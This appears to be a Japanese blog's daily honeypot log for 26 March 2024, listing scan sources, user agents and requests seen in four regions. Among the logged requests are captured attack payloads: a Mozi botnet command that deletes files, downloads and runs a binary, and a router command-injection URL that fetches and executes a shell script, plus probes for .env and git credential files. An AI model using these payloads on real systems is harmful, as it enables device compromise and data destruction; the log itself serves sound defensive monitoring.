2024/03/26 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2024/03/26分です。

特徴

共通

/.envへのスキャン行為
/.gitへのスキャン行為

Location:JP

Spring Bootの脆弱性を狙うアクセス
curlによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:US

Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
curlによるスキャン行為
zgrabによるスキャン行為
.cssへのスキャン行為
Gh0stRATのような動き

を確認しました。

Location:UK

D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
wgetによるスキャン行為
zgrabによるスキャン行為

を確認しました。

Location:SG

D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
TP-Link製品の脆弱性を狙うアクセス
CensysInspectによるスキャン行為
curlによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為

を確認しました。

他

アクセス数推移

JP：総アクセス数：82 (前日比：17)
US：総アクセス数：121 (前日比：38)
UK：総アクセス数：94 (前日比：12)
SG：総アクセス数：112 (前日比：36)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.196.102.65	France
1	5.196.102.72	France
2	34.79.140.188	United States
1	35.163.75.207	United States
1	45.56.108.128	United States
1	45.79.128.205	United States
1	77.239.222.67	Russia
1	80.82.78.39	United Kingdom
1	87.121.69.52	Bulgaria
1	104.192.0.61	United States
1	107.170.248.44	United States
2	107.189.8.226	United States
8	135.125.244.48	France
4	135.125.246.110	France
4	135.125.246.189	France
13	139.59.60.251	Singapore
6	148.153.56.86	United States
13	167.71.18.5	United States
1	170.64.167.197	United States
1	170.64.212.195	United States
1	178.218.144.99	United States
3	184.105.247.195	United States
1	185.223.152.206	Spain
1	185.223.152.213	Spain
6	185.254.196.173	Ukraine
1	188.166.87.67	United States
1	192.241.235.11	United States
2	198.235.24.24	United States
2	205.210.31.50	United States

UserAgent一覧

件数	UserAgent
13	`-`
2	`Go-http-client/1.1`
1	`Hello, world`
6	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1`
16	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0`
26	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0`
2	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0`
2	`Mozilla/5.0 zgrab/0.x`
3	`Mozilla/5.0`
2	`curl/8.1.2`
1	`python-requests/2.25.1`

リクエスト内容一覧

件数	Method	Request	Protocol
12		`\x16\x03\x01`
1	CONNECT	`google[.]com:443`	HTTP/1.1
24	GET	`/.env`	HTTP/1.1
3	GET	`/.git/config`	HTTP/1.1
1	GET	`/.git/index`	HTTP/1.1
1	GET	`/.local/share/sqlmap/`	HTTP/1.1
2	GET	`/1.php`	HTTP/1.1
1	GET	`/F9hu`	HTTP/1.1
1	GET	`/GoBamOIs6Kvrf5kqDHwuYZN1li0`	HTTP/1.1
1	GET	`/aab8`	HTTP/1.1
1	GET	`/aab9`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
2	GET	`/bundle.js`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
2	GET	`/files/`	HTTP/1.1
2	GET	`/form.html`	HTTP/1.1
2	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/hvN1`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
1	GET	`/jquery-3.3.1.slim.min.js`	HTTP/1.1
1	GET	`/jquery-3.3.2.slim.min.js`	HTTP/1.1
2	GET	`/password.php`	HTTP/1.1
1	GET	`/questions`	HTTP/1.1
1	GET	`/sendgrid/.env`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
2	GET	`/systembc/password.php`	HTTP/1.1
2	GET	`/upl.php`	HTTP/1.1
1	GET	`/v3/time`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	18.130.20.35	United States
2	34.122.4.249	United States
1	35.89.240.92	United States
1	45.33.80.243	United States
1	45.79.128.205	United States
1	45.79.181.94	United States
1	45.79.181.104	United States
10	54.36.115.221	France
8	57.129.23.166	France
1	66.240.205.34	United States
2	83.97.73.245	Germany
4	87.121.69.52	Bulgaria
56	104.156.155.30	United States
1	139.59.101.104	Singapore
1	141.94.255.108	France
2	143.198.214.253	United States
1	146.190.50.175	United States
2	162.142.125.12	United States
1	166.0.255.139	United States
2	167.94.138.126	United States
2	167.94.138.127	United States
2	167.248.133.123	United States
1	172.105.128.13	United States
1	184.105.139.69	United States
3	184.105.247.254	United States
4	185.165.190.34	Seychelles
1	192.155.90.118	United States
1	192.155.90.220	United States
1	192.241.219.26	United States
1	192.241.226.24	United States
1	194.165.16.73	Panama
2	198.235.24.154	United States
2	205.210.31.41	United States

UserAgent一覧

件数	UserAgent
26	`-`
4	`Go-http-client/1.1`
1	`Microsoft+BITS/7.8`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0 (Edition Yx 05)`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0`
18	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
4	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
2	`Mozilla/5.0 zgrab/0.x`
2	`Mozilla/5.0`
55	`curl/7.54.0`
1	`python-requests/2.25.1`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`Gh0st\xad`
1		`\x03`
1		`\x16\x03\x01\x01\b\x01`
1		`\x16\x03\x01\x02`
13		`\x16\x03\x01`
1		`\xea\x06\xaa\x03\xb2\xaeK\x19`\x10\x04\xb0\va`
4	CONNECT	`google[.]com:443`	HTTP/1.1
20	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000`	HTTP/1.1
1	GET	`/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/CSS/Miniweb.css`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/Portal/Portal.mwsl`	HTTP/1.1
1	GET	`/Portal0000.htm`	HTTP/1.1
1	GET	`/SMS_DP_SMSPKG$/Datalib`	HTTP/1.0
1	GET	`/__Additional`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin.asp`	HTTP/1.1
1	GET	`/admin.aspx`	HTTP/1.1
1	GET	`/admin.jhtml`	HTTP/1.1
1	GET	`/admin.jsa`	HTTP/1.1
1	GET	`/admin.jsp`	HTTP/1.1
1	GET	`/admin.php`	HTTP/1.1
1	GET	`/admin.pl`	HTTP/1.1
1	GET	`/admin.shtml`	HTTP/1.1
1	GET	`/base.inc`	HTTP/1.1
1	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/confluence/rest/applinks/1.0/manifest`	HTTP/1.1
1	GET	`/ddHL`	HTTP/1.1
1	GET	`/default.aspx`	HTTP/1.1
1	GET	`/default.jhtml`	HTTP/1.1
1	GET	`/default.pl`	HTTP/1.1
1	GET	`/docs/cplugError.html/`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
7	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hello`	HTTP/1.1
1	GET	`/home.cgi`	HTTP/1.1
1	GET	`/home.jhtml`	HTTP/1.1
1	GET	`/home.jsp`	HTTP/1.1
1	GET	`/home.pl`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/index.asp`	HTTP/1.1
1	GET	`/index.aspx`	HTTP/1.1
1	GET	`/index.cfm`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
1	GET	`/indice.aspx`	HTTP/1.1
1	GET	`/indice.cgi`	HTTP/1.1
1	GET	`/indice.pl`	HTTP/1.1
1	GET	`/indice.shtml`	HTTP/1.1
1	GET	`/inicio.asp`	HTTP/1.1
1	GET	`/inicio.cgi`	HTTP/1.1
1	GET	`/inicio.html`	HTTP/1.1
1	GET	`/localstart.jsp`	HTTP/1.1
1	GET	`/main.asp`	HTTP/1.1
1	GET	`/main.pl`	HTTP/1.1
1	GET	`/menu.jhtml`	HTTP/1.1
1	GET	`/nmaplowercheck1711353862`	HTTP/1.1
1	GET	`/pools/default/buckets`	HTTP/1.1
1	GET	`/pools`	HTTP/1.1
1	GET	`/readme.txt`	HTTP/1.1
1	GET	`/rest/applinks/1.0/manifest`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/start.aspx`	HTTP/1.1
1	GET	`/start.jsp`	HTTP/1.1
1	GET	`/start.pl`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0
1	POST	`/scripts/WPnBr.dll`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
4	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.171.146.81	United States
5	31.172.80.202	Germany
2	34.87.226.1	United States
1	35.203.210.207	United States
2	38.242.250.246	United States
24	43.129.219.189	Singapore
1	45.33.80.243	United States
1	45.79.128.205	United States
2	45.79.181.179	United States
2	45.79.181.223	United States
1	54.36.115.221	France
5	54.37.79.75	France
12	57.129.23.166	France
1	64.62.197.62	United States
1	64.62.197.170	United States
1	64.62.197.175	United States
1	64.62.197.178	United States
4	66.240.219.146	United States
2	80.82.78.39	United Kingdom
2	83.97.73.245	Germany
4	87.121.69.52	Bulgaria
1	107.170.231.40	United States
1	115.57.167.133	China
1	139.59.101.104	Singapore
1	146.190.50.175	United States
1	162.216.149.74	United States
1	162.243.149.37	United States
2	167.94.138.126	United States
2	167.94.138.127	United States
1	170.64.131.178	United States
1	172.104.11.51	United States
1	185.122.204.179	Russia
1	192.99.7.195	Canada
2	198.235.24.9	United States
2	198.235.24.251	United States
1	206.189.208.197	United States

UserAgent一覧

件数	UserAgent
47	`-`
2	`Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com`
4	`Go-http-client/1.1`
1	`Microsoft+BITS/7.8`
1	`Mozilla/5.0 (Linux; U; Android 1.1; en-gb; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2`
1	`Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0`
19	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`
3	`Mozilla/5.0`
1	`Wget/1.12 (freebsd8.1)`
1	`python-requests/2.31.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
1		`\x03`
2		`\x16\x03\x01\x01\x9e\x01`
4		`\x16\x03\x01\x01\xa8\x01`
2		`\x16\x03\x01\x01\xb5\x01`
18		`\x16\x03\x01`
2		`\x16\x03\x02\x01\x9b\x01`
2		`\x16\x03\x03\x01I\x01`
2		`\x16\x03\x03\x01W\x01`
2		`\x16\x03\x03\x01\x9a\x01`
4		`\x16\x03\x03\x01\xa6\x01`
4	CONNECT	`google[.]com:443`	HTTP/1.1
21	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.info.php`	HTTP/1.1
1	GET	`/.local/share/sqlmap/`	HTTP/1.1
1	GET	`/.vscode/sftp.json`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`//`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/SMS_DP_SMSPKG$/Datalib`	HTTP/1.0
1	GET	`/actuator/gateway/routes`	HTTP/1.1
2	GET	`/cdn-cgi/trace`	HTTP/1.1
2	GET	`/client/get_targets`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sendgrid.env`	HTTP/1.1
1	GET	`/sftp-config.json`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0
1	POST	`/HNAP1/`	HTTP/1.0
2	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.55.53.144	United States
2	20.163.171.162	United States
1	20.171.146.81	United States
2	34.48.73.145	United States
40	43.163.238.85	China
1	45.56.108.128	United States
1	45.79.181.179	United States
2	45.79.181.251	United States
4	54.36.115.221	France
8	54.37.79.75	France
1	64.62.197.168	United States
1	64.62.197.170	United States
1	64.62.197.175	United States
1	64.62.197.179	United States
1	78.70.203.243	Sweden
2	80.82.78.39	United Kingdom
2	80.94.92.60	Romania
2	83.97.73.245	Germany
4	87.121.69.52	Bulgaria
3	103.56.17.252	China
13	128.199.23.198	United Kingdom
2	157.230.45.135	United States
2	162.142.125.222	United States
1	162.216.150.24	United States
1	166.0.255.139	United States
2	167.94.145.51	United States
1	170.64.174.156	United States
2	172.104.11.46	United States
1	172.105.128.12	United States
1	172.105.128.13	United States
2	192.155.90.220	United States
2	198.235.24.85	United States
2	198.235.24.149	United States

UserAgent一覧

件数	UserAgent
8	`'Mozilla/5.0`
50	`-`
1	`Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com`
7	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.46`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43`
1	`Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko`
15	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0`
2	`Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.31`
1	`curl/8.1.2`
1	`localhost.localdomain/go-network-v2.0.1`
1	`python-requests/2.31.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`\x16\x03\x01\x01\x07\x01`
2		`\x16\x03\x01\x01\x9d\x01`
4		`\x16\x03\x01\x01\xa7\x01`
2		`\x16\x03\x01\x01\xb4\x01`
24		`\x16\x03\x01`
2		`\x16\x03\x02\x01\x9a\x01`
2		`\x16\x03\x03\x01H\x01`
2		`\x16\x03\x03\x01V\x01`
2		`\x16\x03\x03\x01\x99\x01`
4		`\x16\x03\x03\x01\xa5\x01`
4	CONNECT	`google[.]com:443`	HTTP/1.1
16	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.local/share/sqlmap/`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
2	GET	`/c/msdownload/update/software/update/2021/11/6632de33-967441-x86.cab`	HTTP/1.1
1	GET	`/cdn-cgi/trace`	HTTP/1.1
2	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94[.]156[.]8[.]244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
7	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
2	GET	`/fw6I`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/login`	HTTP/1.1
1	GET	`/new/login`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/search/s.php?i=1&id=APOX8NWOV42320`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/viwwwsogou?op=8&query=%E7%A8%8F%E5%BB%BA%09%E9%BE%90%E1%B7%A2`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wh/glass.php`	HTTP/1.1
1	GET	`/zMLUH93A`	HTTP/1.1
1	OPTIONS	`/`	HTTP/1.0
1	POST	`//api/attach`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/QKBFJBVZsPKeqFS/HAchGeCttVyEtqZ.php`	HTTP/1.1
1	POST	`/nvidia_license_upd.php`	HTTP/1.1
1	POST	`/session`	HTTP/1.1
1	POST	`/wp-content/themes/twentytwentyone/inc/block-css.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0